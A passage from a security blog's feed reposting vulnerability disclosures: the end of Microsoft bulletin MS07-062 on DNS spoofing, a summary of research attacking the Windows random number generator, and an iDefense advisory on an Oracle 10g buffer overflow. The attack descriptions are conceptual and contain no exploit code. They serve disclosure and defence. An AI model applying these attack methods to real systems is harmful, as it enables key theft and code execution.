switch.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/promptrestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Display a dialog box prompting the local user to allow a restart&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Special Options&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/forceappsclose&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Forces other programs to close when the computer shuts down&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/log:path&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Allows the redirection of installation log files&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Verifying that the Update Has Been Applied&lt;/b&gt;&lt;/p&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;&lt;b&gt;Microsoft Baseline Security Analyzer&lt;/b&gt;&lt;/p&gt;&lt;p&gt;To verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the section, Detection and Deployment Tools and Guidance, earlier in this bulletin for more information.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;&lt;b&gt;File Version Verification&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.&lt;/p&gt;&lt;table class="numberedList" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;1.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Click &lt;b&gt;Start&lt;/b&gt;, and then click &lt;b&gt;Search&lt;/b&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;2.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;In the &lt;b&gt;Search Results&lt;/b&gt; pane, click &lt;b&gt;All files and folders&lt;/b&gt; under &lt;b&gt;Search Companion&lt;/b&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;3.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;In the &lt;b&gt;All or part of the file name &lt;/b&gt;box, type a file name from the appropriate file information table, and then click &lt;b&gt;Search&lt;/b&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;4.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;In the list of files, right-click a file name from the appropriate file information table, and then click &lt;b&gt;Properties&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Note&lt;/b&gt; Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;5.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;On the &lt;b&gt;Version&lt;/b&gt; tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Note&lt;/b&gt; Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;&lt;b&gt;Registry Key Verification&lt;/b&gt;&lt;/p&gt;&lt;p&gt;You may also be able to verify the files that this security update has installed by reviewing the registry keys listed in the &lt;b&gt;Reference Table&lt;/b&gt; in this section.&lt;/p&gt;&lt;p&gt;These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EF3AE"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EF3AE"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#E2IAE"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#E2IAE"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EHJAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EHJAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;h2 class="extra"&gt;Other Information&lt;/h2&gt;&lt;div class="expandoIndent" style="margin-bottom: 15px;"&gt;&lt;a name="E3GAG"&gt;&lt;/a&gt;&lt;script language="javascript"&gt;sID='5l1-E3GAG'&lt;/script&gt;&lt;h3&gt;Acknowledgments&lt;/h3&gt;&lt;div id="s5l1-E3GAG"&gt;&lt;p&gt;Microsoft &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21127"&gt;thanks&lt;/a&gt; the following for working with us to help protect customers:&lt;/p&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;Alla Berzroutchko of &lt;a href="http://www.scanit.be/"&gt;Scanit&lt;/a&gt; for reporting the DNS Spoofing Attack Vulnerability – (CVE-2007-3898).&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;Amit Klein of &lt;a href="http://www.trusteer.com/"&gt;Trusteer&lt;/a&gt; for reporting the DNS Spoofing Attack Vulnerability – (CVE-2007-3898).&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;Roy Arends of &lt;a href="http://www.nominet.org.uk/"&gt;Nominet UK&lt;/a&gt; for reporting the DNS Spoofing Attack Vulnerability – (CVE-2007-3898).&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#E3GAG"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#E3GAG"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="E2HAG"&gt;&lt;/a&gt;&lt;script language="javascript"&gt;sID='5l1-E2HAG'&lt;/script&gt;&lt;h3&gt;Support&lt;/h3&gt;&lt;div id="s5l1-E2HAG"&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;Customers in the U.S. and Canada can receive technical support from &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21131"&gt;Microsoft Product Support Services&lt;/a&gt; at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21155"&gt;International Support Web site&lt;/a&gt;.&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#E2HAG"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#E2HAG"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="ENIAG"&gt;&lt;/a&gt;&lt;script language="javascript"&gt;sID='5l1-ENIAG'&lt;/script&gt;&lt;h3&gt;Disclaimer&lt;/h3&gt;&lt;div id="s5l1-ENIAG"&gt;&lt;p&gt;The information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.&lt;/p&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ENIAG"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ENIAG"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="EQIAG"&gt;&lt;/a&gt;&lt;script language="javascript"&gt;sID='5l1-EQIAG'&lt;/script&gt;&lt;h3&gt;Revisions&lt;/h3&gt;&lt;div id="s5l1-EQIAG"&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;V1.0 (November 13, 2007): Bulletin published.&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EQIAG"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EQIAG"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#top"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of page" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#top"&gt;Top of page&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7188623624825447391?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7188623624825447391/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7188623624825447391' title='43 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7188623624825447391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7188623624825447391'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/vulnerability-in-dns-allows-spoofing.html' title='Vulnerability in DNS Allows Spoofing (MS07-062)'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>43</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-124945886815504481</id><published>2008-02-08T07:12:00.000-08:00</published><updated>2008-02-08T07:13:49.534-08:00</updated><title type='text'>Cryptanalysis of the Random Number Generator of the Windows Operating System</title><content type='html'>Tomado de: http://www.securiteam.com/securityreviews/6V00B0UKAI.html&lt;br /&gt;&lt;table id="ArticleTABLE" style="width: 100%;" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table id="ArticleTitle" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="header" style="font-size: 150%;" width="80%"&gt;Cryptanalysis of the Random Number Generator of the Windows Operating System&lt;/td&gt;           &lt;td class="header" style="text-align: right;"&gt;13 Nov. 2007&lt;/td&gt;          &lt;/tr&gt;         &lt;/tbody&gt;&lt;/table&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Summary&lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;The pseudo-random number generator (PRNG) used by the Windows operating system is the most commonly used PRNG. The pseudo-randomness of the output of this generator is crucial for the security of almost any application running in Windows. Nevertheless, its exact algorithm was never published.&lt;br /&gt;&lt;br /&gt;We examined the binary code of a distribution of Windows 2000, which is still the second most popular operating system after Windows XP. (This investigation was done without any help from Microsoft.) We reconstructed, for the first time, the algorithm used by the pseudo-random number generator (namely, the function CryptGenRandom). We analyzed the security of the algorithm and found a non-trivial attack: given the internal state of the generator, the previous state can be computed in $O(2^{23})$ work (this is an attack on the forward-security of the generator, an $O(1)$ attack on backward security is trivial). The attack on forward-security demonstrates that the design of the generator is flawed, since it is well known how to prevent such attacks.&lt;br /&gt;&lt;br /&gt;We also analyzed the way in which the generator is run by the operating system, and found that it amplifies the effect of the attacks: The generator is run in user mode rather than in kernel mode, and therefore it is easy to access its state even without administrator privileges. The initial values of part of the state of the generator are not set explicitly, but rather are defined by whatever values are present on the stack when the generator is called.Furthermore, each process runs a different copy of the generator, and the state of the generator is refreshed with system generated entropy only after generating 128 KBytes of output for the process running it. The result of combining this observation with our attack is that learning a single state may reveal 128 Kbytes of the past and future output of the generator.&lt;br /&gt;&lt;br /&gt;&lt;excerpt&gt;The implication of these findings is that a buffer overflow attack or a similar attack can be used to learn a single state of the generator, which can then be used to predict all random values, such as SSL keys, used by a process in all its past and future operation&lt;/excerpt&gt;. This attack is more severe and more efficient than known attacks, in which an attacker can only learn SSL keys if it is controlling the attacked machine at the time the keys are used.&lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;&lt;b&gt;Credit:&lt;/b&gt;&lt;br /&gt;       The information has been provided by &lt;b&gt;Leo Dorrendorf and Zvi Gutterman and Benny Pinkas&lt;/b&gt;.&lt;br /&gt;The original article can be found at: &lt;a href="http://eprint.iacr.org/2007/419"&gt;http://eprint.iacr.org/2007/419&lt;/a&gt;  &lt;br /&gt; &lt;br /&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Details&lt;/td&gt;       &lt;/tr&gt;       &lt;tr align="left"&gt;        &lt;td&gt;   &lt;!-- CC_IMAGE_SELECTION_START --&gt;   &lt;!--   &lt;script type="text/javascript" src="http://apollo.creativecalls.com/ServedByCreativeCalls/AdSelection?campaignName=beyondsecurity"&gt;&lt;/script&gt;   &lt;script type="text/javascript"&gt;    try{    connectionStatus = checkConnectionStatus();    }catch(err){    document.write('&lt;div style="float: right; width: 300px; height: 4em; border: 1px solid #999; margin-left: 1em; margin-bottom: 1em; padding: 1em; text-align: center;"&gt;&lt;a href="http://www.securiteam.com/wssa0205"&gt;Audit your web server for security holes - see what the hackers see.&lt;br /&gt;Sign up for a scan today - risk free!&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;');   }   &lt;/script&gt;   --&gt;   &lt;!-- CC_IMAGE_SELECTION_STOP --&gt;   &lt;div style="border: 1px solid rgb(153, 153, 153); padding: 1em; float: right; width: 300px; height: 4em; margin-left: 1em; margin-bottom: 1em; text-align: center;"&gt;&lt;a href="http://www.securiteam.com/wssa0205"&gt;Audit your web server for security holes - see what the hackers see.&lt;br /&gt;Sign up for a scan today - risk free!&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;      &lt;b&gt;Conclusions&lt;/b&gt;&lt;br /&gt;&lt;i&gt;WRNG design&lt;/i&gt;. The paper presents a clear description of the WRNG, the most frequently used PRNG. The WRNG has a complex layered architecture which includes entropy rekeying every 128 KBytes of output, and uses RC4 and SHA-1 as building blocks. Windows runs the WRNG in user space, and keeps a different instance of the generator for every process.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Attacks&lt;/i&gt;. The WRNG depends on the use of RC4, which does not provide any forward security. We used this fact to show how an adversary which learns the state of the WRNG can compute past and future outputs of the generator. The attacker can learn future outputs in O(1) time and compute past outputs in O(223) time. These attacks can be run within seconds or minutes on a modern PC and enable such an attacker to learn the values of cryptographic keys generated by the generator. The attacks on both forward and backward security reveal all outputs until the time the generator is rekeyed with system entropy. Given the way in which the operating system operates the generator, this means that a single attack reveals 128 KBytes of generator output for every process.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Code analysis&lt;/i&gt;. Our research is based on studying the WRNG by examining its binary code. We were not provided with any help from Microsoft and were only using the binary versions of Windows. To verify our findings we developed a user mode simulator which captures WRNG states and computes future and past outputs of the WRNG. We validated the simulator output against real runs of the WRNG. WRNG versus LRNG. We compared between the pseudo-random generators used by Windows and Linux (WRNG vs. LRNG). The forward security attack on the WRNG is faster by a factor of O(240) compared to the attack on the LRNG. In addition, our findings show that the LRNG has better usage of operating system entropy, uses asynchronous entropy feedings, uses the extraction process as an entropy source, and shares its output between multiple processes. As a result, a forward security attack on the WRNG reveals longer sequences of generator output, compared to an attack on the LRNG.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Recommendations&lt;/b&gt;&lt;br /&gt;&lt;i&gt;Forward security&lt;/i&gt;. The most obvious recommendation is to change the algorithm used by the WRNG to one which provides forward security. This can be done by making local changes to the current implementation of the generator, or by replacing RC4 with a function which provides forward security. Alternatively, it is possible to use the transformation of [4] which transforms any standard generator to one providing forward security. We believe however that it is preferable to replace the entire algorithm used by the generator with a simpler algorithm which is rigorously analyzed. A good approach is to adopt the Barak-Halevi construction. That construction, suggested in [2], is a simple yet powerful construction of entropy based PRNGs. Its design is much simpler to implement than the current WRNG implementation and, assuming that its building blocks are secure, it provably preserves both forward and backward security. It can be implemented using, say, AES and a simple entropy extractor.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Frequency of entropy based rekeys&lt;/i&gt;. The generator should rekey its state more often. We also suggest that rekeys are forced based on the amount of time that has passed since the last rekey. It is important to note that entropy based rekeys are required in order to limit the effect of attacks mounted by an adversary which obtains the state of the generator. (In a good generator, forward security and pseudo-randomness are guaranteed by the function which advances the state, and are ensured even if the generator generates megabytes or gigabytes of output between rekeys.) The risk of an adversary getting hold of the state seems to be more dependent on the amount of time the system runs, than on the length of the output of the generator. It therefore makes sense to force rekeys every some time interval, rather than deciding whether to rekey based on the amount of output produced by the generator.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-124945886815504481?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/124945886815504481/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=124945886815504481' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/124945886815504481'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/124945886815504481'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/cryptanalysis-of-random-number.html' title='Cryptanalysis of the Random Number Generator of the Windows Operating System'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7388288290741362464</id><published>2008-02-08T07:08:00.000-08:00</published><updated>2008-02-08T07:09:55.262-08:00</updated><title type='text'>Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability</title><content type='html'>Tomado de:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=622&lt;br /&gt;&lt;div class="cWhite" style="position: absolute; left: 1px; top: 1px; z-index: 7; width: 100%;"&gt;PUBLIC ADVISORY: 11.07.07&lt;/div&gt;    &lt;div id="div_breadcrumb" class="cWhite"&gt; &lt;a href="http://labs.idefense.com/"&gt;Home&lt;/a&gt; // &lt;a href="http://labs.idefense.com/intelligence"&gt;Current Intelligence&lt;/a&gt; // &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities"&gt;Vulnerability Advisories&lt;/a&gt; // Public Advisory: 11.07.07&lt;/div&gt;      &lt;div id="div_icons" class="fltR"&gt;&lt;a href="javascript:void(0);" onclick="toggleItem('div_emailURL',1);" onmouseover="imgHilite('img_icn_em'); return true;" onmouseout="imgUnHilite('img_icn_em');" title="Email This Page URL"&gt;&lt;img id="img_icn_em" name="img_icn_em" src="http://labs.idefense.com/graphics/template/icons/email_off.gif" alt="Email This Page URL" border="0" height="10" width="45" /&gt;&lt;/a&gt;  &lt;a href="javascript:void(0);" onclick="window.print();" onmouseover="imgHilite('img_icn_pf'); return true;" onmouseout="imgUnHilite('img_icn_pf');" title="Print This Page"&gt;&lt;img id="img_icn_pf" name="img_icn_pf" src="http://labs.idefense.com/graphics/template/icons/print_off.gif" alt="Print This Page" border="0" height="10" width="48" /&gt;&lt;/a&gt;&lt;/div&gt;    &lt;!-- START PAGE CONTENT //--&gt;         &lt;!-- START FIRST COLUMN CONTENT //--&gt;  &lt;div class="p8px fJustify"&gt;    &lt;div class="intelHeadline"&gt;Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability&lt;/div&gt;  &lt;div class="intelBody"&gt;&lt;h4&gt;I. BACKGROUND&lt;/h4&gt; &lt;p&gt; Oracle Database Server is a family of database products that range from personal databases to enterprise solutions. Further information is available at the following URL.   &lt;/p&gt; &lt;p&gt; &lt;a target="_blank" href="http://www.oracle.com/database/index.html"&gt;http://www.oracle.com/database/index.html&lt;/a&gt;   &lt;/p&gt;  &lt;h4&gt;II. DESCRIPTION&lt;/h4&gt; &lt;p&gt; Remote exploitation of a buffer overflow in the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure in Oracle Corp.'s Database 10gR2 could allow a user with an authenticated session to execute arbitrary code in the context of the database account.   &lt;/p&gt; &lt;p&gt; The XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure takes two arguments, OWNER and NAME. The lengths of these arguments are used by an internal function to construct an SQL query without being adequately sanitized. If the combined length of the two fields is too large, a buffer overflow occurs, allowing arbitrary code execution.   &lt;/p&gt;  &lt;h4&gt;III. ANALYSIS&lt;/h4&gt; &lt;p&gt; Exploitation of this vulnerability allows an authenticated remote user to execute code on the underlying system in the context of the database account. Other than access to execute the vulnerable function, this vulnerability does not require any special privileges. From the database user account, an attacker can then access or modify the database and files related to its operation.   &lt;/p&gt;  &lt;h4&gt;IV. DETECTION&lt;/h4&gt; &lt;p&gt; iDefense has confirmed this vulnerability on Oracle Database 10g Release 2 with all Critical Patch Updates as of February 2007. Previous versions are suspected to be vulnerable.   &lt;/p&gt;  &lt;h4&gt;V. WORKAROUND&lt;/h4&gt; &lt;p&gt; iDefense is not aware of any effective workaround for this vulnerability.   &lt;/p&gt;  &lt;h4&gt;VI. VENDOR RESPONSE&lt;/h4&gt; &lt;p&gt; Oracle Corp. has been contacted and stated the following.   &lt;/p&gt; &lt;p&gt; " Tracking #: 9219583 Description: BUFFER OVERFLOW IN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Status: Issue fixed in main codeline, scheduled for a future CPU "   &lt;/p&gt;  &lt;h4&gt;VII. CVE INFORMATION&lt;/h4&gt; &lt;p&gt; The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4517 to this issue. This is a candidate for inclusion in the CVE list (&lt;a target="_blank" href="http://cve.mitre.org/"&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for security problems.   &lt;/p&gt;  &lt;h4&gt;VIII. DISCLOSURE TIMELINE&lt;/h4&gt; &lt;p&gt; 02/01/2007  Initial vendor notification&lt;br /&gt;02/01/2007  Initial vendor response&lt;br /&gt;11/02/2007  Third-party public exploit release&lt;br /&gt;11/07/2007  Public disclosure&lt;br /&gt;&lt;/p&gt; &lt;h4&gt;IX. CREDIT&lt;/h4&gt; &lt;p&gt; The discoverer of this vulnerability wishes to remain anonymous.   &lt;/p&gt;  &lt;p&gt;Get paid for vulnerability research&lt;br /&gt;&lt;a href="http://labs.idefense.com/methodology/vulnerability/vcp.php"&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Free tools, research and upcoming events&lt;br /&gt;&lt;a href="http://labs.idefense.com/"&gt;http://labs.idefense.com/&lt;/a&gt;&lt;/p&gt;  &lt;h4&gt;X. LEGAL 